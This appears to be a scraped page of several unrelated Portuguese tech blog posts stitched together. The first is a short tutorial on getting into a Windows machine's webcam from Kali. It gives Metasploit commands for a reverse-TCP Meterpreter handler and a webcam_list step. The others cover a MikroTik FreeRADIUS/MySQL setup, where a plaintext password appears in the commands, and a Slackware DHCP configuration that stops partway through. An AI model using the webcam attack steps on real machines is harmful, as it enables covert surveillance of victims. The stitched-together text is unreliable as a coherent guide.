Reforçando>> “Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”
Hoje Iremos abordar como acessar, Webcam conectada a um S.O windows com o kali linux, lembrando que o video ja mostra logado no “msfconsole”, quem não sabe como fazer os passos anteriores, por favor acessem esse link que mostro como fazer.
Comandos usados no acesso;
use exploit/multi/handler
use exploit/multi/handler= Carregando módulo a ser usado
set payload windows/meterpreter/reverse_tcp
set payload windows/meterpreter/reverse_tcp= método utilizado
set lhost
set lhost= inserir o ip do kali
set lport
set lport= inserir a porta a ser utilizada
exploit
exploit = execução do backdoor
webcam_list
webcam_list= mostra se tem alguma webcam conectada
Fala meus bons e amados irmãos de guerra, hoje vamos ver em simples passos como criar um um servidor de Radius para autenticação de usuários do mikrotik em pppoe no servidor Mysql.
Basicamente a estrutura se resume no seguinte.
* Essa RB ai é só pra descrever o que usei.
Rb com 5 portas, rodando RouterOs 5.25
Turnkey linux 14 baseado no Debian Jessie 8
Freeradius + Mysql
Na nossa routerboard temos 5 portas, usaremos apenas 3, uma para comunicação com o servidor radius, uma para rede de clientes e uma para conexão com a internet.
O Cenário é basicamente esse abaixo:
RB – Porta Ether1 > 10.2.2.13/28 (Internet)
RB – Porta Ether3 > 10.1.1.1/24 (Conexão com o Freeradius)
RB – Porta Ether5 > 10.2.3.1 (Com pool para Clientes PPPoE)
Linux Server – eth0 : 10.1.1.10/24
Cliente 10.2.3.150 (Endereço Já entregue pelo PPPoE após discar)
Bom, o procedimento é bem simples como descrito no vídeo, que embora um pouco longo é bem satisfatório.
Bom, basicamente é isso. O restante do conteúdo pode ser visto no vídeo.
Neste vídeo, vamos trabalhar de forma diferente do primeiro, aliás, é interessante que você tenha visto o primeiro para que possamos entender as mudanças nas configurações em relação a ele.
Então, vejam o vídeo, no mais alguns dos comandos usados estão disponíveis logo a baixo e eu estou atualizando esse post (infelizmente estou com um problema no nervo do braço esquerdo e quase não estou conseguindo digitar, então irei atualizando calmamente isso. OK?)
Os comandos usados neste vídeo foram: root@mysql/# mysql -uroot -pThiago123 mysql> create database radius; mysql> grant all privileges on radius.* to radius@localhost identified by 'Thiago123'
mysql> \q
Bye
Importando as databases, ou scripts que já vem preconfigurados com o freeradius: root@mysql/# mysql -uroot -pThiago123 radius < /etc/freeradius/sql/mysql/schema.sql root@mysql/# mysql -uroot -pThiago123 radius < /etc/freeradius/sql/mysql/nas.sql root@mysql/# mysql -uroot -pThiago123 radius < /etc/freeradius/sql/mysql/ippool.sql
Amigos, mais uma vez é um prazer imensuravel estar por aqui e poder compartilhar um pouco do meu conhecimento com essa grande comunidade.
Vamos configurar um Slackware para servir internet e DHCP ?
O video aborda as configurações basicas necessarias para que possamos ter nosso firewall funcinando. Este video será o primeiro de uma serie que farei a respeito do sistema, então vamos lá.
Primeiro, faça um backup das configurações atuais.
cd /etc/
mv dnsmasq.conf dnsmasq.conf.bkp
nano dnsmasq.conf
Adicione as linhas em cinza abaixo ou crie as regras de acordo com suas necessidades. #ARQUIVO DE CONFIGURAÇÃO DHCP SERVER #DECLARAR ABAIXO A INTERFACE A SER USADA interface=eth1 #<IP INICIAL>,<IP FNAL>,<MASK>.<LEASE> dhcp-range=10.22.33.100,10.22.33.120,255.255.255.0,12h #GATEWAY PADRÃO dhcp-option=3,10.22.33.1 #SERVIDORES DNS dhcp-option=6,10.22.33.1 #SERVIDOR DE NOME – SUFIXO DNS dhcp-option=15,slack-video.prefirolinux.com # dhcp-authoritative
rc.firewall
Siga os comandos para a criação do script
cd /etc/rc.d
nano rc.firewall e adicione as seguintes linhas destacadas em vermelho: